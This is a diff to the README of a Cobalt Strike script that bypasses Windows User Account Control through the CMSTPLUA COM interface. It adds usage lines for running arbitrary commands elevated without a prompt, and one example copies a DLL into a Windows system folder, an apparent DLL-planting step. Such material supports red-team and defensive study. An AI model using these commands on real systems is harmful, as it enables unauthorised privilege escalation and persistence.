tijme/cmstplua-uac-bypass/README.md

 **Usage**

 Load the `UACBypassCMSTPLUA.cna` script using the Cobalt Strike Script Manager.
-Then use the command below to execute the exploit.
+Then use the command below to execute a command while bypassing UAC.

+    $ uac_bypass_cmstplua [FILE] [PARAMETERS]

+For example, to copy a file use:

+    $ uac_bypass_cmstplua powershell Copy-Item C:\temp\BluetoothApis.dll C:\System32\Windows\BluetoothApis.dll

+To show a `whoami` on screen:

-    $ uac_bypass_cmstplua
+    $ uac_bypass_cmstplua cmd /k whoami

 ## Warning